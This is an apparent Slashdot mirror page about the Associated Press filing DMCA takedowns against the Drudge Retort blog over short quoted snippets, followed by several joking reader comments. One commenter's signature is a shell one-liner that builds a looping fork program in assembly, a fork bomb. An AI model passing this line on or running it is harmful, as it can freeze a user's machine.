Slashdot Mirror


AP Files 7 DMCA Takedowns Against Drudge Retort

mytrip points out a blog posting by Rogers Cadenhead, author of the Drudge Retort blog, who says: "I'm currently engaged in a legal disagreement with the Associated Press, which claims that Drudge Retort users linking to its stories are violating its copyright and committing 'hot news' misappropriation under New York state law." An AP attorney filed six Digital Millennium Copyright Act takedown requests this week demanding the removal of blog entries and another for a user comment. The AP material they object to consists of snippets of from 33 to 79 words. Cadenhead claims his lawyer believes that all fall squarely within the province of fair use.

9 of 177 comments (clear)

  1. My first suggestion by deft · · Score: 4, Funny

    Is to figure out if it's six or 7.... article says 7, summary says 6.

    --

    There's nothing Intelligent about Intelligent Design.
    1. Re:My first suggestion by deft · · Score: 5, Funny

      In other news, I'll go ahead and try to figure out of it's 6 or six.

      --

      There's nothing Intelligent about Intelligent Design.
  2. And in other news.... by Cutie+Pi · · Score: 5, Funny

    SourceForge, Inc. files 32,819 DMCA notices against its daughter site, Slashdot.org, for blatantly reproducing its own stories, such as this one.

    1. Re:And in other news.... by Anonymous Coward · · Score: 2, Funny

      SourceForge, Inc. files 32,819 DMCA notices against its daughter site, Slashdot.org, for blatantly reproducing its own stories, such as this [slashdot.org] one. You mean "SourceForge, Inc. files -51 DMCA notices against its daughter site, Slashdot.org, for blatantly reproducing its own stories, such as this [slashdot.org] one." ...
  3. Slashdot Files 7 DMCA Takedowns Against Slashdot by Anonymous Coward · · Score: 2, Funny

    DMCA in this case refers to the Dupes Make Cmdrtaco Angry

  4. AP Stylebook by Enderandrew · · Score: 2, Funny

    Consult the AP stylebook.

    --
    http://blindscribblings.com - Tasty pop-culture in conceptual fashion.
  5. Re:kdawson, dupe, again. by MobileTatsu-NJG · · Score: 3, Funny

    "Is the search function really so hard to use?"

    Yeah because Slashdot's search function is second only to Google.

    --

    "I like to lick butts!" by MobileTatsu-NJG (#32700246) (Score:5, Informative)

  6. Re:I'll say it again. by gnick · · Score: 5, Funny

    ...and a handful of good porn sites... [Citation needed]
    Please?
    --
    He's getting rather old, but he's a good mouse.
  7. Re:what is the deal with "drudge retort"? by Hal_Porter · · Score: 2, Funny

    I think he's right. This Drudge Retort guy is clearly taking advantage of the Drudge Report's high alexa rating. And most of his original content is scrapped.

    He can go on about parody, mashups and so on. But in the end it reminds me of Victor Lewis Smith's quip that "imitation is the sincerest form of being an unoriginal thieving bastard"

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;